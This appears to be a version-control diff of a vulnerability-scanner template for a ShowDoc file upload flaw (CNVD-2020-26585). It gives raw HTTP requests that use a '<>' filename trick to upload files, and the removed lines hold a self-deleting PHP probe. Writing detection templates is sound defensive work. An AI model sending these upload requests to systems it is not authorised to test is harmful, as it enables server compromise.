updated matcher and info

2023-03-31 15:49:43 +05:30 · 2023-03-31 15:49:43 +05:30 · ca3037cce5
parent d11ded4682
commit ca3037cce5
1 changed files with 31 additions and 32 deletions
--- a/cnvd/2020/CNVD-2020-26585.yaml
+++ b/cnvd/2020/CNVD-2020-26585.yaml
@ -1,13 +1,15 @@
 id: CNVD-2020-26585

 info:
-  name: Showdoc File Uploads
-  author: Co5mos
+  name: Showdoc <2.8.6 - File Uploads
+  author: pikpikcu,Co5mos
  severity: critical
-  description: ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions.
+  description: |
+    ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions.
  reference:
    - https://vul.wangan.com/a/CNVD-2020-26585
    - https://blog.csdn.net/qq_48985780/article/details/122211136
+    - https://github.com/star7th/showdoc/pull/1059
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
    cvss-score: 9.9
@ -15,55 +17,52 @@ info:
  metadata:
    verified: true
    fofa-query: app="ShowDoc"
-  tags: showdoc,cnvd,cnvd2020,fileupload
+  tags: cnvd,cnvd2020,showdoc,fileupload

 requests:
  - raw:
      - |
        POST /index.php?s=/home/page/uploadImg HTTP/1.1
        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Connection: close
-        Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
-        Content-Length: 264
+        Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633

-        ----------------------------921378126371623762173617
-        Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
+        ----------------------------835846770881083140190633
+        Content-Disposition: form-data; name="editormd-image-file"; filename="{{randstr}}.<>txt"
        Content-Type: text/plain

-        <?php echo md5('CNVD-2020-26585'); unlink(__FILE__); ?>
-        ----------------------------921378126371623762173617--
+        test{{randstr}}
+        ----------------------------835846770881083140190633--

      - |
        GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1
        Host: {{Hostname}}

-    extractors:
-      - type: regex
-        name: date
-        part: body
-        internal: true
-        group: 1
-        regex:
-          - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.php)'
-
-      - type: regex
-        name: file
-        part: body
-        internal: true
-        group: 2
-        regex:
-          - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.php)'
-
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
-          - "8e20346f3b8304b53f3b120c2b857742"
+          - "test{{randstr}}"

      - type: status
        status:
          - 200
+
+    extractors:
+      - type: regex
+        name: date
+        part: body
+        group: 1
+        regex:
+          - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)'
+        internal: true
+
+      - type: regex
+        name: file
+        part: body
+        group: 2
+        regex:
+          - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)'
+        internal: true
+
+# Enhanced by mp on 2022/05/30